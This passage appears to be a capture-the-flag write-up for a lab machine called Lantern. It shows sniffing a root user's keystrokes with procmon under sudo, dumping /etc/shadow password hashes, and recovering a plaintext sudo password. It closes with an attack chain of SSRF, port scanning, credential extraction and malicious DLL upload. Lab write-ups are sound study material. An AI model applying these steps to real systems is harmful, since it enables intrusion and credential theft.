root 843 1 0 Aug26 ? 00:00:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 844 1 0 Aug26 ? 00:00:00 /usr/libexec/polkitd --no-debug
syslog 845 1 0 Aug26 ? 00:00:00 /usr/sbin/rsyslogd -n -iNONE
www-data 846 1 0 Aug26 ? 00:00:07 skipper -routes-file /var/www/sites/skipper/flask.eskip -address :80 -proxy-preserv
root 849 1 0 Aug26 ? 00:00:01 /usr/lib/snapd/snapd
root 852 1 0 Aug26 ? 00:00:00 /lib/systemd/systemd-logind
root 853 1 0 Aug26 ? 00:00:00 /usr/libexec/udisks2/udisksd
root 905 1 0 Aug26 ? 00:00:00 /usr/sbin/ModemManager
root 1122 1 0 Aug26 ? 00:00:00 /usr/sbin/cron -f -P
root 1140 1 0 Aug26 tty1 00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1153 1 0 Aug26 ? 00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
www-data 1255 840 0 Aug26 ? 00:00:03 dotnet /var/www/sites/.nuget/packages/microsoft.aspnetcore.components.webassembly.d
root 2933 1 0 Aug26 ? 00:00:00 /usr/libexec/upowerd
root 7850 2 0 06:08 ? 00:00:00 [kworker/u256:3-flush-8:0]
root 7975 2 0 06:13 ? 00:00:00 [kworker/u256:2-writeback]
tomas 8145 1 0 06:24 ? 00:00:00 /lib/systemd/systemd --user
tomas 8146 8145 0 06:24 ? 00:00:00 (sd-pam)
root 8666 2 0 06:40 ? 00:00:00 [kworker/0:3-cgroup_destroy]
root 8685 1153 0 06:41 ? 00:00:00 sshd: tomas [priv]
tomas 8747 8685 0 06:41 ? 00:00:00 sshd: tomas@pts/1
tomas 8748 8747 0 06:41 pts/1 00:00:00 -bash
root 8850 2 0 06:47 ? 00:00:00 [kworker/0:0-events]
root 9017 2 0 06:54 ? 00:00:00 [kworker/1:1-cgroup_destroy]
root 9130 2 0 07:00 ? 00:00:00 [kworker/1:0-cgroup_destroy]
root 9188 2 0 07:02 ? 00:00:00 [kworker/u256:0-events_unbound]
root 9205 1 0 07:10 ? 00:00:00 /usr/bin/expect -f /root/bot.exp
root 9206 9205 0 07:10 pts/0 00:00:00 nano /root/automation.sh
root 9220 2 0 07:10 ? 00:00:00 [kworker/1:2-events]
root 9222 2 0 07:10 ? 00:00:00 [kworker/0:1-events]
tomas 9231 1 1 07:10 ? 00:00:01 dotnet run
root 9239 2 0 07:10 ? 00:00:00 [kworker/1:3-cgroup_destroy]
tomas 9251 9231 0 07:10 ? 00:00:00 /home/tomas/LanternAdmin/bin/Debug/net6.0/LanternAdmin
tomas 9278 8748 0 07:11 pts/1 00:00:00 ps -ef
tomas@lantern:~$ sudo /usr/bin/procmon -p 9206 -c db
In file included from <built-in>:2:
In file included from /virtual/include/bcc/bpf.h:12:
In file included from include/linux/types.h:6:
In file included from include/uapi/linux/types.h:14:
In file included from include/uapi/linux/posix_types.h:5:
In file included from include/linux/stddef.h:5:
In file included from include/uapi/linux/stddef.h:5:
In file included from include/linux/compiler_types.h:80:
include/linux/compiler-clang.h:41:9: warning: '__HAVE_BUILTIN_BSWAP32__' macro redefined [-Wmacro-redefined]
#define __HAVE_BUILTIN_BSWAP32__
^
<command line>:4:9: note: previous definition is here
#define __HAVE_BUILTIN_BSWAP32__ 1
^
In file included from <built-in>:2:
In file included from /virtual/include/bcc/bpf.h:12:
In file included from include/linux/types.h:6:
In file included from include/uapi/linux/types.h:14:
In file included from include/uapi/linux/posix_types.h:5:
In file included from include/linux/stddef.h:5:
In file included from include/uapi/linux/stddef.h:5:
In file included from include/linux/compiler_types.h:80:
include/linux/compiler-clang.h:42:9: warning: '__HAVE_BUILTIN_BSWAP64__' macro redefined [-Wmacro-redefined]
#define __HAVE_BUILTIN_BSWAP64__
^
<command line>:5:9: note: previous definition is here
#define __HAVE_BUILTIN_BSWAP64__ 1
^
In file included from <built-in>:2:
In file included from /virtual/include/bcc/bpf.h:12:
In file included from include/linux/types.h:6:
In file included from include/uapi/linux/types.h:14:
In file included from include/uapi/linux/posix_types.h:5:
In file included from include/linux/stddef.h:5:
In file included from include/uapi/linux/stddef.h:5:
In file included from include/linux/compiler_types.h:80:
include/linux/compiler-clang.h:43:9: warning: '__HAVE_BUILTIN_BSWAP16__' macro redefined [-Wmacro-redefined]
#define __HAVE_BUILTIN_BSWAP16__
^
<command line>:3:9: note: previous definition is here
#define __HAVE_BUILTIN_BSWAP16__ 1
^
3 warnings generated.
prog tag mismatch 988359b7a44779c7 1
WARNING: cannot get prog tag, ignore saving source with program tag
prog tag mismatch 7d5844821d4b1151 1
WARNING: cannot get prog tag, ignore saving source with program tag
Procmon 1.0 - (C) 2020 Microsoft Corporation. Licensed under the MIT license.
Copyright (C) 2020 Microsoft Corporation. All rights reserved. Licensed under the MIT license.
Mark Russinovich, Mario Hewardt, Javid Habibi, John Salem
Press Ctrl-C to end monitoring without terminating the process.
PID Filter: 9206
Syscall Filter: All Syscalls
Events captured: 9050^C
Writing events to db
Total events captured: 9050
这里有一个进程叫 nano /root/automation.sh
十分的可疑
监控 root root 9206 9205 0 07:10 pts/0 00:00:00 nano /root/automation.sh
的系统调用
然后保存到本地
❯ sqlite3 db
SQLite version 3.39.5 2022-10-14 20:58:05
Enter ".help" for usage hints.
sqlite> .tables;
Error: unknown command or invalid arguments: "tables;". Enter ".help" for help
sqlite> .tables
ebpf metadata stats
sqlite> .out out.txt
sqlite> select hex(substr(arguments,9,resultcode)) from ebpf where resultcode > 0 order by timestamp;
sqlite>
shadow
root@lantern:~# cat /etc/shadow | grep \$y
root:$y$j9T$AIkP6DcupUzzLuD19q8Ea.$yfGWAj50b/chhcl4fuZL3jkIlp2NrkL63C5TXcDumJ0:19718:0:99999:7:::
tomas:$y$j9T$iBupKrKnYvDsG24KvgKi61$P9qTNx7BdVbyqWp5homuabzMA/vr.h3fds5VYDeMII3:19718:0:99999:7:::
root@lantern:~# cat bot.exp
#!/usr/bin/expect -f
spawn nano /root/automation.sh
set text "echo Q3Eddtdw3pMB | sudo ./backup.sh"
while {1} {
foreach char [split $text ""] {
send "$char"
sleep 1
}
send "\r"
sleep 0.5
for {set i 0} {$i < [string length $text]} {incr i} {
send "\b \b" ;
}
send "\r"
}
In summary
user
80→ Skipper Proxy → ssrf → portScan → 5000 → blazor.boot.json → InternaLantern →base64-decode (get Port 3000 credential) → login → app.py → read file → /opt/components/Logs.dll → upload evil Dll → load Evil Dll by search button
Root
sudo -l → procmon → sudo nano /root/automatic.sh → dump ebpf syscall file → get Strings from dump file